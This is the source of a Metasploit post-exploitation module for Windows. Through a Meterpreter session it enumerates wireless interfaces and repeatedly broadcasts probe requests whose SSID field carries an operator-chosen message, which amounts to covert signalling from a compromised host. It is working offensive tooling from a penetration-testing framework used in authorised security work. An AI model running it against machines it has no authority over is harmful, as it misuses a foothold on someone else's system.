##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
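class MetasploitModule < Msf::Post
  # DOT11_SSID.ucSSID is a fixed 32-byte array, so the SSID "message" is
  # limited to 32 *bytes* (not characters) and the struct must be padded
  # to its full size before being handed to WlanScan.
  DOT11_SSID_MAX_LENGTH = 32

  # Human-readable names for WLAN_INTERFACE_STATE values as read from the
  # 4-byte isState field of each WLAN_INTERFACE_INFO entry.
  INTERFACE_STATES = {
    0 => 'The interface is not ready to operate.',
    1 => 'The interface is connected to a network.',
    2 => 'The interface is the first node in an ad hoc network. No peer has connected.',
    3 => 'The interface is disconnecting from the current network.',
    4 => 'The interface is not connected to any network.',
    5 => 'The interface is attempting to associate with a network.',
    6 => 'Auto configuration is discovering the settings for the network.',
    7 => 'The interface is in the process of authenticating.'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Send Probe Request Packets',
        'Description' => %q{
          This module send probe requests through the wlan interface.
          The ESSID field will be use to set a custom message.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_process_attach
              stdapi_sys_process_getpid
            ]
          }
        }
      )
    )
    register_options(
      [
        OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
        OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', 30])
      ]
    )
  end

  # Entry point: opens a WlanAPI client handle, enumerates the wireless
  # interfaces and repeatedly calls WlanScan with a DOT11_SSID whose body is
  # the operator-supplied message, until TIMEOUT seconds elapse.
  #
  # The handle is released on every exit path (timeout, no interfaces, or an
  # unexpected railgun error), not only when the timeout fires.
  def run
    ssid = datastore['SSID'].to_s
    time = datastore['TIMEOUT']

    # Check the byte length: a multi-byte (e.g. UTF-8) message can be <= 32
    # characters yet exceed the 32-byte ucSSID array.
    if ssid.bytesize > DOT11_SSID_MAX_LENGTH
      print_error('The SSID must be equal to or less than 32 bytes')
      return
    end

    mypid = client.sys.process.getpid
    @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
    @wlanapi = client.railgun.wlanapi

    wlan_handle = open_handle
    unless wlan_handle
      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
      print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')
      return
    end

    begin
      wlan_iflist = enum_interfaces(wlan_handle)
      if wlan_iflist.empty?
        print_status('Wlan interfaces not found')
        return
      end
      print_status("Wlan interfaces found: #{wlan_iflist.length}")
      print_status("Sending probe requests for #{time} seconds")

      dot11_ssid = build_dot11_ssid(ssid)

      # NOTE(review): Timeout.timeout(nil) or Timeout.timeout(0) runs the block
      # without a limit, so an unset/zero TIMEOUT loops until the job is killed.
      ::Timeout.timeout(time) do
        loop do
          wlan_iflist.each do |interface|
            send_probe(wlan_handle, interface, dot11_ssid)
          end
        end
      end
    rescue ::Timeout::Error
      # Expected: the probing loop is terminated by the timeout.
      nil
    ensure
      close_handle(wlan_handle)
    end
  end

  # Builds a DOT11_SSID structure:
  #
  #   typedef struct _DOT11_SSID {
  #     ULONG uSSIDLength;
  #     UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
  #   } DOT11_SSID, *PDOT11_SSID;
  #
  # uSSIDLength is the byte count of the message and ucSSID is NUL-padded to
  # its full 32 bytes so the caller always hands WlanScan a complete 36-byte
  # struct rather than a short buffer.
  #
  # @param ssid [String] message of at most DOT11_SSID_MAX_LENGTH bytes
  # @return [String] binary (ASCII-8BIT) struct, 36 bytes long
  def build_dot11_ssid(ssid)
    raw = ssid.b
    [raw.bytesize].pack('L<') << raw.ljust(DOT11_SSID_MAX_LENGTH, "\x00")
  end

  # Issues one WlanScan on the given interface, logs the payload when verbose
  # and reports a non-zero return code, then pauses 10 seconds (a scan is
  # asynchronous on the target; the pause spaces out successive probes).
  #
  # @param wlan_handle [Integer] client handle from open_handle
  # @param interface [Hash] entry from enum_interfaces ('guid', 'state', ...)
  # @param dot11_ssid [String] struct from build_dot11_ssid
  def send_probe(wlan_handle, interface, dot11_ssid)
    vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
    vprint_status("Interface State: #{interface['state']}")
    vprint_status("DOT11_SSID payload: #{dot11_ssid.unpack('C*').map { |b| b.to_s(16) }.join(':')}")
    result = @wlanapi.WlanScan(wlan_handle, interface['guid'], dot11_ssid, nil, nil)
    # A scan request can fail silently (e.g. interface not ready); surface it.
    vprint_error("WlanScan returned #{result['return']}") unless result['return'] == 0
    sleep(10)
  end

  # Closes the WlanAPI client handle and reports the outcome.
  #
  # @param wlan_handle [Integer] client handle from open_handle
  def close_handle(wlan_handle)
    closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)
    if closehandle['return'] == 0
      print_status('WlanAPI Handle closed successfully')
    else
      print_error('There was an error closing the Handle')
    end
  end

  # Function borrowed from @theLightCosine wlan_* modules
  #
  # Opens a WlanAPI client handle (client version 2).
  #
  # @return [Integer, nil] the handle, or nil when railgun raises or
  #   WlanOpenHandle returns a non-zero error code (a handle value of 0 is
  #   truthy in Ruby, so the return code must be checked explicitly)
  def open_handle
    begin
      wlhandle = @wlanapi.WlanOpenHandle(2, nil, 4, 4)
    rescue StandardError
      return nil
    end
    return nil unless wlhandle['return'] == 0

    wlhandle['phClientHandle']
  end

  # Function borrowed from @theLightCosine wlan_* modules
  #
  # Enumerates wireless interfaces by reading the WLAN_INTERFACE_INFO_LIST
  # that WlanEnumInterfaces allocates in the target process:
  #   4-byte dwNumberOfItems, 4-byte dwIndex, then one entry per interface of
  #   16-byte GUID, 512-byte description (read raw, not decoded) and 4-byte state.
  #
  # NOTE(review): the list buffer is never released with WlanFreeMemory and
  # stays allocated in the target process until the handle is closed.
  #
  # @param wlan_handle [Integer] client handle from open_handle
  # @return [Array<Hash>] one hash per interface with 'guid' (16 raw bytes),
  #   'description' (512 raw bytes) and 'state' (human-readable String);
  #   empty when the call fails
  def enum_interfaces(wlan_handle)
    iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)
    # On failure the out pointer is not meaningful; do not read from it.
    return [] unless iflist['return'] == 0

    pointer = iflist['ppInterfaceList']
    numifs = @host_process.memory.read(pointer, 4).unpack('V')[0]

    # Skip dwNumberOfItems and dwIndex to reach the first array element.
    pointer += 8
    Array.new(numifs) do
      guid = @host_process.memory.read(pointer, 16)
      pointer += 16
      description = @host_process.memory.read(pointer, 512)
      pointer += 512
      state = @host_process.memory.read(pointer, 4).unpack('V')[0]
      pointer += 4
      {
        'guid' => guid,
        'description' => description,
        'state' => INTERFACE_STATES.fetch(state, 'Unknown State')
      }
    end
  end
end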